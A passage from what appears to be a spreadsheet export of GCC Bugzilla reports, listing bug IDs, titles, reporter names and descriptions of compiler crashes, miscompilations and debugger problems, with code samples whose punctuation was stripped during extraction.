#3  0x00007f04bb0ffc94 in __GI__IO_getline_info (fp=fp@entry=0x7f04bb4324c0  buf=buf@entry=0x7ffdd8139e60 'F'  \n n=99 delim=delim@entry=10 
    extract_delim=extract_delim@entry=1 eof=eof@entry=0x0) at iogetline.c:69
#4  0x00007f04bb0ffd88 in __GI__IO_getline (fp=fp@entry=0x7f04bb4324c0  buf=buf@entry=0x7ffdd8139e60 'F'  \n n= 
    delim=delim@entry=10 extract_delim=extract_delim@entry=1) at iogetline.c:38
#5  0x00007f04bb0fec34 in _IO_fgets (buf=0x7ffdd8139e60 'F'  \n n= fp=0x7f04bb4324c0 ) at iofgets.c:56
#6  0x000000000040230b in ?? ()
#7  0x00007f04bb0b78c5 in __libc_start_main (main=0x401fc0 argc=6 argv=0x7ffdd8139fe8 init= fini= rtld_fini= 
    stack_end=0x7ffdd8139fd8) at libc-start.c:289
#8  0x0000000000402855 in ?? ()
Detaching from program: /usr/bin/addr2line process 18348
$&gt;
$&gt; gdb -p 18346 -ex bt -ex info threads -ex detach -ex q 2&gt;/dev/null | tail -n 15
0x00007fda31d43f44 in __libc_wait (stat_loc=0x0) at ../sysdeps/unix/sysv/linux/wait.c:35
#0  0x00007fda31d43f44 in __libc_wait (stat_loc=0x0) at ../sysdeps/unix/sysv/linux/wait.c:35
#1  0x00007fda328eb4e9 in _gfortrani_backtrace () at ../../../libgfortran/runtime/backtrace.c:263
#2  0x00007fda328ea6b1 in _gfortrani_backtrace_handler (signum=8) at ../../../libgfortran/runtime/compile_options.c:129
#3  
#4  0x0000000000400a6d in MAIN__._omp_fn.0 () at test.F90:9
#5  0x0000000000400986 in test () at test.F90:6
#6  0x00000000004009cb in main (argc=1 argv=0x7ffc70796e8f) at test.F90:15
#7  0x00007fda319b48c5 in __libc_start_main (main=0x40098d  argc=1 argv=0x7ffc707969c8 init= fini= rtld_fini= 
    stack_end=0x7ffc707969b8) at libc-start.c:289
#8  0x0000000000400899 in _start () at ../sysdeps/x86_64/start.S:118
  Id   Target Id         Frame 
  2    Thread 0x7fda3178f700 (LWP 18347) test 0x00007fda31d43f44 in __libc_wait (stat_loc=0x0) at ../sysdeps/unix/sysv/linux/wait.c:35
* 1    Thread 0x7fda32dd8780 (LWP 18346) test 0x00007fda31d43f44 in __libc_wait (stat_loc=0x0) at ../sysdeps/unix/sysv/linux/wait.c:35
Detaching from program: /home/lorenz/dev/addr2line_bug/test process 18346
$&gt;
#######################################################
I would guess there is some thread-unsafety in libgfortran/runtime/backtrace.c?
Kind regards
  Lorenz</t>
  </si>
  <si>
    <t>GCC-1635</t>
  </si>
  <si>
    <t>2 constructors and 3 destructors called for thrown object</t>
  </si>
  <si>
    <t>The sample code simply throws an exception and trace all
constructors (default and copy) the destructor and a
few other calls on cerr. This is a sample output
(the numbers are the object addresses).
create   3221224208
op &lt;&lt;    3221224208
copy     134521840
delete   3221224212
delete   3221224208
catch    134521840
delete   134521840
We see that an object is destructed at address ...212 
without having been created.
Release:
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
How-To-Repeat:
The following code is simply compiled with for example
  g++ -o p p.cpp
** Source code **
#include 
class E
{
  public:
    E() { cerr &lt;&lt; create  &lt;&lt; (unsigned int)(this) &lt;&lt; endl }
    E(E  }
   ~E() { cerr &lt;&lt; delete  &lt;&lt; (unsigned int)(this) &lt;&lt; endl }
    E  return *this }
}
main()
{
    try
    {
        throw E() &lt;&lt; 1
    }
    catch(E &amp;e)
    {
        cerr &lt;&lt; catch   &lt;&lt; (unsigned int)(
    }
}</t>
  </si>
  <si>
    <t>ouej</t>
  </si>
  <si>
    <t>GCC-53410</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] ICE in build_int_cst_wide at tree.c:1219</t>
  </si>
  <si>
    <t>[regehr@dyson r51]$ current-gcc -v
Using built-in specs.
COLLECT_GCC=current-gcc
COLLECT_LTO_WRAPPER=/uusoc/exports/scratch/regehr/z/compiler-install/gcc-r187663-install/bin/../libexec/gcc/x86_64-unknown-linux-gnu/4.8.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --with-libelf=/usr/local --enable-lto --prefix=/home/regehr/z/compiler-install/gcc-r187663-install --program-prefix=r187663- --enable-languages=cc++
Thread model: posix
gcc version 4.8.0 20120518 (experimental) (GCC) 
[regehr@dyson r51]$ current-gcc -c -O3 small.c
small.c: In function 'fn1':
small.c:4:1: internal compiler error: in build_int_cst_wide at tree.c:1219
 fn1 ()
 ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
[regehr@dyson r51]$ cat small.c 
int *a
int b c d
void
fn1 ()
{
    for ( d &lt;= 0 d++)
        b 
}</t>
  </si>
  <si>
    <t>GCC-67436</t>
  </si>
  <si>
    <t>[C++14] Generic lambda capture fails for thread_local variables</t>
  </si>
  <si>
    <t>I encountered an error with a missing __tls_init after using a thread_local variable within a generic lambda. I was able to work around this bug by creating a reference to the thread_local and using the reference in the lambda instead.
I was not able to reproduce the exact same behavior with a minimal example however this code
int main(int char**)
{
	thread_local int foo
	[&amp;] (auto bar) {
		foo += bar
	}(1u)
	return 0
}
Causes an internal compiler error
tls_init_bug.cpp: In instantiation of â€˜main(int char**):: [with auto:1 = unsigned int]â€™:
tls_init_bug.cpp:6:6:   required from here
tls_init_bug.cpp:1:5: internal compiler error: in tsubst_decl at cp/pt.c:10836
 int main(int char**)
     ^
0x658caa tsubst_decl
        ../../gcc-5.2.0/gcc/cp/pt.c:10836
0x64b084 tsubst(tree_node* tree_node* int tree_node*)
        ../../gcc-5.2.0/gcc/cp/pt.c:11934
0x656ba2 tsubst_copy
        ../../gcc-5.2.0/gcc/cp/pt.c:13093
0x647c18 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
        ../../gcc-5.2.0/gcc/cp/pt.c:15705
0x648e53 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
        ../../gcc-5.2.0/gcc/cp/pt.c:15032
0x650162 tsubst_expr
        ../../gcc-5.2.0/gcc/cp/pt.c:14530
0x64f2c6 tsubst_expr
        ../../gcc-5.2.0/gcc/cp/pt.c:13941
0x6500ac tsubst_expr
        ../../gcc-5.2.0/gcc/cp/pt.c:14113
0x6500ac tsubst_expr
        ../../gcc-5.2.0/gcc/cp/pt.c:14113
0x64ee17 instantiate_decl(tree_node* int bool)
        ../../gcc-5.2.0/gcc/cp/pt.c:20543
0x67e062 mark_used(tree_node* int)
        ../../gcc-5.2.0/gcc/cp/decl2.c:5032
0x61db00 build_over_call
        ../../gcc-5.2.0/gcc/cp/call.c:7501
0x620231 build_op_call_1
        ../../gcc-5.2.0/gcc/cp/call.c:4345
0x620231 build_op_call(tree_node* vec** int)
        ../../gcc-5.2.0/gcc/cp/call.c:4368
0x6e7408 finish_call_expr(tree_node* vec** bool bool int)
        ../../gcc-5.2.0/gcc/cp/semantics.c:2426
0x69b6e1 cp_parser_postfix_expression
        ../../gcc-5.2.0/gcc/cp/parser.c:6375
0x69db79 cp_parser_unary_expression
        ../../gcc-5.2.0/gcc/cp/parser.c:7438
0x69e6f7 cp_parser_binary_expression
        ../../gcc-5.2.0/gcc/cp/parser.c:8172
0x69eced cp_parser_assignment_expression
        ../../gcc-5.2.0/gcc/cp/parser.c:8430
0x6a1061 cp_parser_expression
        ../../gcc-5.2.0/gcc/cp/parser.c:8584
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
I originally found this error with GCC 5.1 mingw-w64 however it occurs with GCC 5.2 on linux as well.</t>
  </si>
  <si>
    <t>j.s.mueller-roemer</t>
  </si>
  <si>
    <t>GCC-546</t>
  </si>
  <si>
    <t>-dM broken</t>
  </si>
  <si>
    <t>`gcc -dM -E - &lt;/dev/null' ought to show the predefined macros.  With
current CVS it gives no output.
Release:
2.96
Environment:
System: Linux decomino 2.2.17 #1 Mon Sep 4 20:22:16 UTC 2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu</t>
  </si>
  <si>
    <t>GCC-22189</t>
  </si>
  <si>
    <t>Table Full in gcj-dbtool if -m option used with smallest possible input</t>
  </si>
  <si>
    <t>The attached test case aot-compiles HelloWorld.java builds a .db file and then
merges that single .db file into another .db file. (Because it is only
merging a single file and the destination .db does not exist it is in effect
a copy rather than a merge.) But gcj-dbtool fails with this error message:
java.lang.IllegalAccessException: Table Full: 0
   at gnu.gcj.runtime.PersistentByteMap.put(byte[] byte[])
(/usr/lib/libgcj.so.6.0.0)
   at
gnu.gcj.runtime.PersistentByteMap.putAll(gnu.gcj.runtime.PersistentByteMap)
(/usr/lib/libgcj.so.6.0.0)
   at gnu.java.lang.MainThread.call_main() (/usr/lib/libgcj.so.6.0.0)
   at gnu.java.lang.MainThread.run() (/usr/lib/libgcj.so.6.0.0)
This is with gcj-dbtool (GNU libgcj) 4.0.0 20050622 (Red Hat 4.0.0-13)</t>
  </si>
  <si>
    <t>GCC-32361</t>
  </si>
  <si>
    <t>TYPE DECLARATION TO INITIALIZE DATA IN NAMED COMMON</t>
  </si>
  <si>
    <t>Description:
This test case resulted from attempting to modify the way that the
initialization of pointers in a named common was done in some OpenMP tests.  
This test case is syntatically correct but the gfortran 
compiler is not able to compile it.
&gt; gfortran -v
Using built-in specs.
Target: x86_64-suse-linux
Configured with: ../xt-gcc-4.2.0/configure --prefix=/opt/gcc/4.2.0/snos --disable-nls --libdir=/opt/gcc/4.2.0/snos/lib --enable-languages=cc++fortran --with-gxx-include-dir=/opt/gcc/4.2.0/snos/include/g++ --with-slibdir=/opt/gcc/4.2.0/snos/lib --with-system-zlib --enable-shared --enable-__cxa_atexit x86_64-suse-linux
Thread model: posix
gcc version 4.2.0 20070514 (rpm:4)
&gt; cat bug2828.f90
      BLOCK DATA
       integer pointer :: ptr1 =&gt; NULL()
       common / T / ptr1
      END
&gt; ftn -c bug2828.f90
/opt/xt-pe/2.1/bin/snos64/ftn: INFO: linux target is being used
bug2828.f90:3.24:
       common / T / ptr1
                       1
Error: Previously initialized symbol 'ptr1' in COMMON block 't' at (1)
- - -
Note: reversing the common and integer statements still results in an error.
------
Note: ftn is an alias for:
/opt/gcc/4.2.0/bin/../snos/bin/gfortran -static -v -I/opt/xt-mpt/2.1/mpich2-64/GP/include -I/opt/xt-mpt/2.1/mpich2-64/GP/include -L/opt/xt-mpt/2.1/mpich2-64/GP/lib -I/opt/acml/3.6.1/gnu64/include -I/opt/xt-libsci/10.1.0/gnu/snos64/include -I/opt/xt-libsci/10.1.0/gnu/snos64/include/superlu -I/opt/xt-mpt/2.1/sma/P/include -L/opt/acml/3.6.1/gnu64/lib -L/opt/xt-libsci/10.1.0/gnu/snos64/lib -L/opt/xt-mpt/2.1/sma/P/lib -lmpichf90 -lsci -lacml -lsma -lmpichf90 -lmpich -lrt -D__CRAYXT_COMPUTE_LINUX_TARGET -D__TARGET_LINUX__ -fno-second-underscore -I/notbackedup/users/rsrel/rs64.DEV.070604.Mon/install/include -I/opt/xt-catamount/2.1/catamount/linux/include -I/opt/xt-service/2.1/include -L/notbackedup/users/rsrel/rs64.DEV.070604.Mon/install/lib/snos64 -L/opt/xt-pe/2.1/cnos/linux/64/lib -L/opt/xt-mpt/2.1/lib/snos64 -L/opt/xt-service/2.1/lib/snos64 -Wl--start -lpct -lalpslli -lalpsutil -lportals -lpthread -Wl--end -lgfortranbegin -lgfortran -lm</t>
  </si>
  <si>
    <t>GCC-10393</t>
  </si>
  <si>
    <t>gcc does not generate code for loop</t>
  </si>
  <si>
    <t>The loop starting on line 5848 of the preprocessed source is optimized out when compiling with -O3. The body of the loop is generated but the looping code is not. Correct code is generated if -O3 is not specified.
Release:
gcc version 3.2.2 (mingw special 20030208-1)
Environment:
Windows 2000
Configured with: ../gcc/configure --with-gcc --with-gnu-ld --with-gnu-as --host=
mingw32 --target=mingw32 --prefix=/mingw --enable-threads --disable-nls --enable
-languages=c++f77objc --disable-win32-registry --disable-shared --enable-sjlj-
exceptions
Thread model: win32
gcc version 3.2.2 (mingw special 20030208-1)
How-To-Repeat:
Compile source with -O3</t>
  </si>
  <si>
    <t>dagren</t>
  </si>
  <si>
    <t>GCC-478</t>
  </si>
  <si>
    <t>egcs 1.1.2-30 gets internal compiler error compiling STLport 4.0 on Redhat 6.2</t>
  </si>
  <si>
    <t>egcs 1.1.2-30 gets internal compiler error when compiling 
STLport 4.0.
Release:
unknown
Environment:
sony f490 laptopredhat 6.2 egcs 1.1.2-30
How-To-Repeat:
download STLport-4.0.tar from www.stlport.org
cp gcc-glibc.mak to Makefile
enter make clean then make all
the very first file it compiles is dll_main.cpp and this
is where it errors out.
here's what happens just after entering make all ::
c++ -I../stlport -W -Wno-sign-compare -Wno-unused -Wno-uninitialized -D__STL_USE
_GLIBC -D__STL_REAL_LOCALE_IMPLEMENTED -O2 -fpic dll_main.cpp -c -o obj/GCC/Rele
aseD/dll_main.o
dll_main.cpp: In instantiation of `__debug_alloc&lt;::_STL::::_STL::__node_alloc&lt;tr
ue0&gt; &gt;':
dll_main.cpp:18:   instantiated from `::_STL::::_STL::__debug_alloc&lt;::_STL::::_S
TL::__node_alloc &gt;'
dll_main.cpp:18:   instantiated from here
dll_main.cpp:18: Internal compiler error.
dll_main.cpp:18: Please submit a full bug report to `egcs-bugs@egcs.cygnus.com'.
dll_main.cpp:18: See  for details
.</t>
  </si>
  <si>
    <t>mattwisner</t>
  </si>
  <si>
    <t>GCC-20112</t>
  </si>
  <si>
    <t>gdb will not print subroutine arguments</t>
  </si>
  <si>
    <t>Sorry guys - I don't know if any of this should work but I tried to use gdb
with limited success - if the subroutine argument values would have printed gdb
would have been working well enough to be useful.
[dir:~/tests/gfortran] dir% gfortran  -g -o debug debug.f
[dir:~/tests/gfortran] dir% gdb debug
GNU gdb 5.3-20030128 (Apple version gdb-330.1) (Fri Jul 16 21:42:28 GMT 2004)
Copyright 2003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powerpc-apple-darwin.
Reading symbols for shared libraries ..... done
(gdb) break sub1_
Breakpoint 1 at 0x1c90: file ../../../gcc/libgfortran/runtime/error.c line 275.
(gdb) break sub1
Function sub1 not defined.
(gdb) run
Starting program: /Users/dir/tests/gfortran/debug 
Reading symbols for shared libraries ++. done
Error in re-setting breakpoint 1:
Function sub1_ not defined.
Re-enabling shared library breakpoints: 1
Breakpoint 1 0x00001c90 in sub1_ (a=Invalid F77 type code 17 in symbol table.
) at debug.f:5
5             subroutine sub1(ab)
(gdb) s
Current language:  auto currently fortran
sub1_ (a=Invalid F77 type code 17 in symbol table.
) at debug.f:6
6             i=3
(gdb) s
7             write(**)ab
(gdb) print a
$1 = (Invalid type code (17) in symbol table.
(gdb) print b
$2 = (Invalid type code (17) in symbol table.
(gdb) quit
The program is running.  Exit anyway? (y or n) y
[dir:~/tests/gfortran] dir% cat debug.f
      program main
      call sub1(1.02.0)
      stop
      end
      subroutine sub1(ab)
      i=3
      write(**)ab
      return
      end</t>
  </si>
  <si>
    <t>GCC-44059</t>
  </si>
  <si>
    <t>[4.5 Regression] Static initializers executed more than once when using unique global symbols</t>
  </si>
  <si>
    <t>With g++ 4.5.0 static initializers can be executed more than once.
Here's how. Let a.cc contain the following code:
#include 
struct A {
  A() {
    static int x = printf(x initialized at @%p\n 
  }
}
extern C void inita()
void inita()
{
  A x
  A y
}
And let b.cc be the copy of a.cc where 'inita' has been renamed
to 'initb'. Then make a shared library a.so from a.cc and b.so from
b.cc. Finally make a program that dynamically loads a.so and b.so
and calls inita and initb functions.
Since 'x' ends up as a unique global symbol there will be only one
object in the process but the initialization code will be run twice
(the address printed will be the same).</t>
  </si>
  <si>
    <t>ivan.stankovic</t>
  </si>
  <si>
    <t>GCC-16480</t>
  </si>
  <si>
    <t>using -msdata causes internal compiler error</t>
  </si>
  <si>
    <t>Code compiles fine without -msdata tag gives an internal compiler error when
tag is used. Will attach the preprocessor output.
The following is the full output:
------------- Compiling /home/kurt/Flame/FlameAVC/build/source/main.o...
/opt/gcc/bin/powerpc-eabi-gcc -msoft-float -mcpu=405 -msdata -v -save-temps
-mmultiple -O2 -Wall -I/home/kurt/Flame/flame-ecos_install/include
-I/home/kurt/Flame/FlameAVC/build/include -ffunction-sections -fdata-sections
-fstrict-aliasing -D SBP2_NO_EXCLUSIVE  -D AVCTGT_DONT_ADD_ROM_ENTRY  -D
INCLUDE_OHCI -D DMASafeBuffersNeeded=1 -D INCLUDE_GUID_PLUGIN -D
ORANGELINK_PATCH=0 -D DBG -D logMsg=TNFprintf -D WALNUT -c
/home/kurt/Flame/FlameAVC/build/source/main.c -o
/home/kurt/Flame/FlameAVC/build/source/main.o
Reading specs from /opt/gcc/lib/gcc/powerpc-eabi/3.4.1/specs
Configured with: ../gcc-3.4.1/configure --prefix=/opt/gcc --target=powerpc-eabi
--enable-languages=cc++ --with-newlib
--with-headers=../newlib-1.12.0/newlib/libc/include
Thread model: single
gcc version 3.4.1
 /opt/gcc/libexec/gcc/powerpc-eabi/3.4.1/cc1 -E -quiet -v
-I/home/kurt/Flame/flame-ecos_install/include
-I/home/kurt/Flame/FlameAVC/build/include -D SBP2_NO_EXCLUSIVE -D
AVCTGT_DONT_ADD_ROM_ENTRY -D INCLUDE_OHCI -D DMASafeBuffersNeeded=1 -D
INCLUDE_GUID_PLUGIN -D ORANGELINK_PATCH=0 -D DBG -D logMsg=TNFprintf -D WALNUT
/home/kurt/Flame/FlameAVC/build/source/main.c -msdata=default -msoft-float
-mcpu=405 -msdata -mmultiple -Wall -ffunction-sections -fdata-sections
-fstrict-aliasing -O2 -o main.i
#include ... search starts here:
#include  search starts here:
 /home/kurt/Flame/flame-ecos_install/include
 /home/kurt/Flame/FlameAVC/build/include
 /opt/gcc/lib/gcc/powerpc-eabi/3.4.1/include
 /opt/gcc/lib/gcc/powerpc-eabi/3.4.1/../../../../powerpc-eabi/sys-include
 /opt/gcc/lib/gcc/powerpc-eabi/3.4.1/../../../../powerpc-eabi/include
End of search list.
In file included from /home/kurt/Flame/FlameAVC/build/source/main.c:2:
/home/kurt/Flame/FlameAVC/build/include/Flame.h:172:1: warning: multi-line comment
 /opt/gcc/libexec/gcc/powerpc-eabi/3.4.1/cc1 -fpreprocessed main.i
-msdata=default -quiet -dumpbase main.c -msoft-float -mcpu=405 -msdata
-mmultiple -auxbase-strip /home/kurt/Flame/FlameAVC/build/source/main.o -O2
-Wall -version -ffunction-sections -fdata-sections -fstrict-aliasing -o main.s
GNU C version 3.4.1 (powerpc-eabi)
	compiled by GNU C version 3.3.1 (SuSE Linux).
GGC heuristics: --param ggc-min-expand=64 --param ggc-min-heapsize=64337
/home/kurt/Flame/FlameAVC/build/source/main.c: In function `IdleLoop':
/home/kurt/Flame/FlameAVC/build/source/main.c:165: internal compiler error: in
rs6000_split_multireg_move at config/rs6000/rs6000.c:10448
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [/home/kurt/Flame/FlameAVC/build/source/main.o] Error 1</t>
  </si>
  <si>
    <t>GCC-39707</t>
  </si>
  <si>
    <t>gcc does not emit debug_pubtypes</t>
  </si>
  <si>
    <t>gcc does not emit debug_pubtypes except on Darwin.
It seems like it ought to do this unconditionally
given that it is part of dwarf.</t>
  </si>
  <si>
    <t>GCC-9860</t>
  </si>
  <si>
    <t>ICE in emit_move_insn_1 at expr.c:3114</t>
  </si>
  <si>
    <t>I was trying to compile the linux kernel 2.4.18 with the ABI-patch from linux-abi.sf.net. I stuck at the compilation of sysi86.c on every platform I could reach.
Release:
unknown
Environment:
Linux/Intel gcc-2.95.2/2.95.3/3.2/3.2.1 gentoo suse-7.0/7.3/8.1
How-To-Repeat:
gcc -S sysi86.i</t>
  </si>
  <si>
    <t>jschulz</t>
  </si>
  <si>
    <t>GCC-9221</t>
  </si>
  <si>
    <t>Incorrect dynamic cast failure</t>
  </si>
  <si>
    <t>// The following code compiles with g++ -O0 dcast.cpp.
// The second assertion incorrectly fails.
#include 
struct B1
{
  virtual ~B1() {}
}
struct B2
{
  virtual ~B2() {}
  virtual B2* clone() const = 0
}
struct D : public B1 public B2
{
  D() : B1() B2() { }
  D* clone() const { return new D }
}
int main()
{
  D d
  B2* p1 = 
  B2* pb = p1-&gt;clone()
  assert ( pb != 0 )
  D* pd = dynamic_cast(pb)
  assert ( pd != 0 )
  delete pb
}
Release:
gcc (GCC) 3.2 20020927 (prerelease)
Environment:
Cygwin 1.3.18-1 on Windows 2000.
How-To-Repeat:
Compile the source file with 'g++ -O0' or any other
optimization level.</t>
  </si>
  <si>
    <t>paterno</t>
  </si>
  <si>
    <t>GCC-32847</t>
  </si>
  <si>
    <t>FAIL: tmpdir-g++.dg-struct-layout-1/t028 cp_compat_y_tst.o compile  (ICE)</t>
  </si>
  <si>
    <t>Executing on host: /home/dave/gnu/gcc-4.3/objdir/gcc/testsuite/g++/../../g++ -B/
home/dave/gnu/gcc-4.3/objdir/gcc/testsuite/g++/../../  -nostdinc++ -I/home/dave/
gnu/gcc-4.3/objdir/hppa-linux/libstdc++-v3/include/hppa-linux -I/home/dave/gnu/g
cc-4.3/objdir/hppa-linux/libstdc++-v3/include -I/home/dave/gnu/gcc-4.3/gcc/libst
dc++-v3/libsupc++ -I/home/dave/gnu/gcc-4.3/gcc/libstdc++-v3/include/backward -I/
home/dave/gnu/gcc-4.3/gcc/libstdc++-v3/testsuite/util -fmessage-length=0 -w -I/h
ome/dave/gnu/gcc-4.3/gcc/gcc/testsuite/g++.dg/compat   -c  -o cp_compat_y_tst.o
/home/dave/gnu/gcc-4.3/objdir/gcc/testsuite/g++/g++.dg-struct-layout-1//t028_y.C
    (timeout = 300)
In file included from /home/dave/gnu/gcc-4.3/objdir/gcc/testsuite/g++/g++.dg-str
uct-layout-1//t028_y.C:7:
/home/dave/gnu/gcc-4.3/objdir/gcc/testsuite/g++/g++.dg-struct-layout-1//t028_tes
t.h: In function 'void check2820va(int ...)':
/home/dave/gnu/gcc-4.3/objdir/gcc/testsuite/g++/g++.dg-struct-layout-1//t028_tes
t.h:21: error: unable to generate reloads for:
(jump_insn 27 319 28 4 /home/dave/gnu/gcc-4.3/objdir/gcc/testsuite/g++/g++.dg-st
ruct-layout-1//t028_test.h:21 (parallel [
            (set (pc)
                (mem:SI (plus:SI (mult:SI (reg:SI 176)
                            (const_int 4 [0x4]))
                        (label_ref 28)) [0 S4 A32]))
            (clobber (reg:SI 178))
        ]) 207 {casesi32} (expr_list:REG_DEAD (reg:SI 176)
        (expr_list:REG_UNUSED (reg:SI 178)
            (nil))))
/home/dave/gnu/gcc-4.3/objdir/gcc/testsuite/g++/g++.dg-struct-layout-1//t028_test.h:21: internal compiler error: in find_reloads at reload.c:3733
Please submit a full bug report</t>
  </si>
  <si>
    <t>GCC-32087</t>
  </si>
  <si>
    <t>ICE with FORTRAN and -fprefetch-loop-arrays</t>
  </si>
  <si>
    <t>The following program will ICE when compiled with -O2 -fprefetch-loop-arrays on a x86_64 box or on IA64 box (Linux and/or HP-UX in 64 bit mode).  scale_bbs_frequencies_int is called with nbbs=1 num=0 and den=0.  Since we do a division by den the compiler aborts during the division.  If we give X a size of 2 instead of 1 the ICE does not happen.
$ cat x.f
      SUBROUTINE TFHF(HINTNVARNCOORDLDI)
      IMPLICIT DOUBLE PRECISION(A-HO-Z)
      DIMENSION HINT(LDINVAR)
      COMMON /FMCOM / X(1)
      LHI   = 1 + LOADFM + (NCOORD*NVAR) + (NCOORD*NCOORD+NCOORD)/2
      LOC = LHI-1
      DO 160 I = 1NVAR
         DO 150 J = 1I
            LOC = LOC + 1
            HINT(IJ) = X(LOC)
            HINT(JI) = X(LOC)
  150    CONTINUE
  160 CONTINUE
      RETURN
      END
$ gfortran -O2 -fprefetch-loop-arrays -c x.f
x.f: In function 'tfhf':
x.f:1: internal compiler error: Floating point exception
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-2749</t>
  </si>
  <si>
    <t>Internal compiler error while using template</t>
  </si>
  <si>
    <t>Here is a bug-report.
### File ttt.C ###
//------------- C++ code : BEGIN -------------
   1
      2     template 
      3     class BBB
      4
      5     template 
      6     class AAA
      7     {   // Line#7
      8     template  friend BBB
      9     }
     10
     11     template 
     12     class BBB {}
     13
     14     int main (void)
     15     {
     16     AAA a    // Line#16
     17       return 0
     18
//------------- C++ code : END ---------------
//------------- System : BEGIN ----------------
%uname -sr
Linux 2.2.17-21mdk
//------------- System : END ------------------
//------------- Compiling : BEGIN --------------
g++ -v -save-temps ttt.C
Reading specs from /usr/lib/gcc-lib/i586-mandrake-linux/2.95.3/specs
gcc version 2.95.3 19991030 (prerelease)
 /usr/lib/gcc-lib/i586-mandrake-linux/2.95.3/cpp -lang-c++ -v -D__GNUC__=2 -D__GNUG__=2 
-D__GNUC_MINOR__=95 -D__cplusplus -D__ELF__ -Dunix -D__i386__ -Dlinux -D__ELF__ -D__unix__ -D__i386__ 
-D__linux__ -D__unix -D__linux -Asystem(posix) -D__EXCEPTIONS -Acpu(i386) -Amachine(i386) -Di386 -D__i386 
-D__i386__ -Di586 -Dpentium -D__i586 -D__i586__ -D__pentium -D__pentium__ ttt.C ttt.ii
GNU CPP version 2.95.3 19991030 (prerelease) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc-lib/i586-mandrake-linux/2.95.3/../../../../include/g++-3
 /usr/local/include
 /usr/lib/gcc-lib/i586-mandrake-linux/2.95.3/../../../../i586-mandrake-linux/include
 /usr/lib/gcc-lib/i586-mandrake-linux/2.95.3/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
End of omitted list.
 /usr/lib/gcc-lib/i586-mandrake-linux/2.95.3/cc1plus ttt.ii -quiet -dumpbase ttt.cc -version -o ttt.s
GNU C++ version 2.95.3 19991030 (prerelease) (i586-mandrake-linux) compiled by GNU C version 2.95.3 19991030 
(prerelease).
ttt.C: In instantiation of `AAA':
ttt.C:16:   instantiated from here
ttt.C:7: Internal compiler error.
ttt.C:7: Please submit a full bug report.
ttt.C:7: See  for instructions.
//------------- Compiling : BEGIN --------------
//------------- File ttt.ii : BEGIN ---------------
# 1 ttt.C
    template 
    class BBB
    template 
    class AAA
    {
    template  friend BBB
    }
    template 
    class BBB {}
    int main (void)
    {
    AAA a
      return 0
    }
//------------- File ttt.ii : BEGIN ---------------
============================
Alex Vinokur
   mailto:alexvn@bigfoot.com
============================
Release:
g++ 2.95.3
Environment:
Linux 2.2.17-21mdk</t>
  </si>
  <si>
    <t>alexvn</t>
  </si>
  <si>
    <t>GCC-69999</t>
  </si>
  <si>
    <t>[6 Regression] ICE in verify_loop_structure at cfgloop.c:1639 (error: loop with header 3 not in loop tree) at -O3 or -Ofast</t>
  </si>
  <si>
    <t>gcc-6.0.0-alpha20160221 fails w/ the following reduced snippet at -O3 or -Ofast:
int uh
void
ha(void)
{
  while (uh) {
    for (uh = 0 uh &lt; 1 ++uh) {
      uh = 0
      if (uh != 0)
 ts:
        uh %= uh
    }
    ++uh
  }
  goto ts
}
% gcc-6.0.0-alpha20160221 -c -O3 nh81gazb.c 
nh81gazb.c: In function 'ha':
nh81gazb.c:4:1: error: loop with header 3 not in loop tree
 ha(void)
 ^~
nh81gazb.c:4:1: internal compiler error: in verify_loop_structure at cfgloop.c:1639</t>
  </si>
  <si>
    <t>GCC-61806</t>
  </si>
  <si>
    <t>[C++11] Expression sfinae w/o access gives hard error in partial template specializations</t>
  </si>
  <si>
    <t>The following code compiled with gcc 4.10.0 20140714 (experimental) using the flags
-Wall -Wextra -std=c++11 -pedantic
or - alternatively -
-Wall -Wextra -std=c++1y -pedantic
//-----------------------
struct true_type 
{
  static const bool value = true
}
struct false_type 
{
  static const bool value = false
}
template
T
template struct check { typedef void type }
template
struct has_public_f : false_type {}
template
struct has_public_f&lt;
    T
    typename check&lt;
        decltype(
            declval().f()
        )
    &gt;::type
&gt; : true_type {}
struct Spub  { public: void f() }
struct Spriv { private: void f() }
static_assert( has_public_f::value Ouch)
static_assert(!has_public_f::value Ouch)
int main() {}
//-----------------------
is rejected with the following diagnostics:
prog.cc: In instantiation of 'struct has_public_f': 
prog.cc:33:35: required from here 
prog.cc:30:30: error: 'void Spriv::f()' is private 
  struct Spriv { private: void f() } 
                               ^ 
prog.cc:27:15: error: within this context 
  &gt; : true_type {} 
                ^ 
prog.cc:30:30: error: 'void Spriv::f()' is private 
  struct Spriv { private: void f() } 
                               ^ 
prog.cc:27:15: error: within this context 
  &gt; : true_type {} 
                ^ 
prog.cc:30:30: error: 'void Spriv::f()' is private 
  struct Spriv { private: void f() } 
                               ^ 
prog.cc:33:16: error: within this context     
  static_assert(!has_public_f::value Ouch) 
                 ^ 
prog.cc:33:1: error: static assertion failed: Ouch 
  static_assert(!has_public_f::value Ouch) 
  ^
It seems that in this context there is no silent rejection of the partial specialization albeit it should.</t>
  </si>
  <si>
    <t>GCC-6732</t>
  </si>
  <si>
    <t>misaligned objects created by new</t>
  </si>
  <si>
    <t>operator new produces misaligned objects when __attribute__((__aligned__(16)) is used
Release:
gcc version 3.1
Environment:
Cygwin 1.3.9/Windows XP
How-To-Repeat:
compile attached program
$ g++ bug.ii</t>
  </si>
  <si>
    <t>wesslen</t>
  </si>
  <si>
    <t>GCC-18326</t>
  </si>
  <si>
    <t>[4.0 regression] mmix-knuth-mmixware testsuite failure: gcc.c-torture/execute/20040625-1.c</t>
  </si>
  <si>
    <t>Public note of failure.  The test passed around 2004-10-09 on the 3.4 branch.
With LAST_UPDATED: Sat Nov  6 19:25:03 GMT 2004 I get:
FAIL: gcc.c-torture/execute/20040625-1.c execution  -O0
FAIL: gcc.c-torture/execute/20040625-1.c execution  -O1
FAIL: gcc.c-torture/execute/20040625-1.c execution  -O2
